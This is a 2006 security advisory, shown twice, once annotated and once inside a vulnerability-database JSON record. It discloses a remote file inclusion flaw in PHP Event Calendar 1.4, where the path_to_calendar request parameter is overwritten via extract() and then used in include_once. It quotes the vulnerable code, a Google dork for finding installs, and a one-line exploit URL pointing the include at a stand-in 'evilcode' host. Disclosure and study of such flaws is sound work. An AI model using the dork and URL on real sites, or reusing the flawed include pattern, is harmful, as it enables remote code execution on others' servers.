#############################SolpotCrew Community################################
#
# PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion
#
# Vendor site : http://www.softcomplex.com/products/php_event_calendar/
#
#################################################################################
#
#
# Bug Found By :Solpot a.k.a (k. Hasibuan) (13th july 2006)
#
# contact: chris_hasibuan@yahoo.com
#
# Website : http://www.solpotcrew.org/adv/solpot-adv-01.txt
#
################################################################################
#
#
# Greetz: choi , h4ntu , Ibnusina , Lappet_tutung , ilalang23 , r4dja ,
# L0sTBoy , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
# home_edition2001 , Anggands , Rendy , cow_1seng
# and all crew #mardongan @ irc.dal.net
#
#
###############################################################################
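Input passed to the "path_to_calendar" parameter is not properly verified
before being used to include files. The script calls extract() on the POST
and GET arrays immediately before the include, so a request parameter named
"path_to_calendar" replaces the script's own value. This can be exploited to
execute arbitrary PHP code by including files from local or external resources.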
Vulnerable code from calendar.php:
// Excerpt from calendar.php as quoted by the advisory; the code is reproduced
// unchanged and only annotated.
// Fall back to $_path_to_calendar when $path_to_calendar is unset or falsy.
if(!$path_to_calendar){
$path_to_calendar = $_path_to_calendar;
}
// extract() copies every POST parameter, then every GET parameter, into the
// current scope. With its default flag (EXTR_OVERWRITE) a variable that
// already exists is replaced, so a request parameter named "path_to_calendar"
// overrides the value assigned above.
// NOTE(review): $HTTP_POST_VARS / $HTTP_GET_VARS are the legacy long request
// arrays; a fix would read only the expected keys from $_POST / $_GET rather
// than calling extract() on request data.
extract($HTTP_POST_VARS);
extract($HTTP_GET_VARS);
// The include prefix is request-controlled at this point, which is the file
// inclusion flaw the advisory describes. A fix builds the path from a fixed
// base (for example __DIR__ or a value from trusted configuration) and never
// from request input; keeping allow_url_include disabled additionally stops
// URL wrappers from being accepted by include.
include_once $path_to_calendar.'db.php';
function show_calendar($index_calendar='') {
global $db,$path_to_data,$settings;
Google dork : inurl:/cl_files/
exploit : http://somehost/path_to_cl_files/calendar.php?path_to_calendar=http://evilcode
##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F##################################
{"id": "SECURITYVULNS:DOC:13557", "bulletinFamily": "software", "title": "PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion", "description": "#############################SolpotCrew Community################################\r\n#\r\n# PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion \r\n#\r\n# Vendor site : http://www.softcomplex.com/products/php_event_calendar/\r\n#\r\n#################################################################################\r\n#\r\n#\r\n# Bug Found By :Solpot a.k.a (k. Hasibuan) (13th july 2006)\r\n#\r\n# contact: chris_hasibuan@yahoo.com \r\n# \r\n# Website : http://www.solpotcrew.org/adv/solpot-adv-01.txt\r\n#\r\n################################################################################\r\n#\r\n#\r\n# Greetz: choi , h4ntu , Ibnusina , Lappet_tutung , ilalang23 , r4dja , \r\n# L0sTBoy , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa\r\n# home_edition2001 , Anggands , Rendy , cow_1seng\r\n# and all crew #mardongan @ irc.dal.net\r\n#\r\n#\r\n###############################################################################\r\nInput passed to the "path_to_calendar" is not properly verified \r\nbefore being used to include files. 
This can be exploited to execute \r\narbitrary PHP code by including files from local or external resources.\r\n\r\ncode from calendar.php\r\n\r\nif(!$path_to_calendar){\r\n $path_to_calendar = $_path_to_calendar;\r\n}\r\nextract($HTTP_POST_VARS);\r\nextract($HTTP_GET_VARS);\r\ninclude_once $path_to_calendar.'db.php';\r\nfunction show_calendar($index_calendar='') {\r\n global $db,$path_to_data,$settings;\r\n\r\nGoogle dork : inurl:/cl_files/\r\n\r\nexploit : http://somehost/path_to_cl_files/calendar.php?path_to_calendar=http://evilcode\r\n\r\n\r\n##############################MY LOVE JUST FOR U RIE#########################\r\n######################################E.O.F##################################\r\n\r\n", "published": "2006-07-24T00:00:00", "modified": "2006-07-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13557", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:18", "edition": 1, "viewCount": 104, "enchantments": {"score": {"value": 1.5, "vector": "NONE"}, "dependencies": {"references": []}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6389"]}]}, "exploitation": null, "vulnersScore": 1.5}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659916711, "score": 1659917426}, "_internal": {"score_hash": "24a2d1101fd1dbc288a58b7b711d6532"}}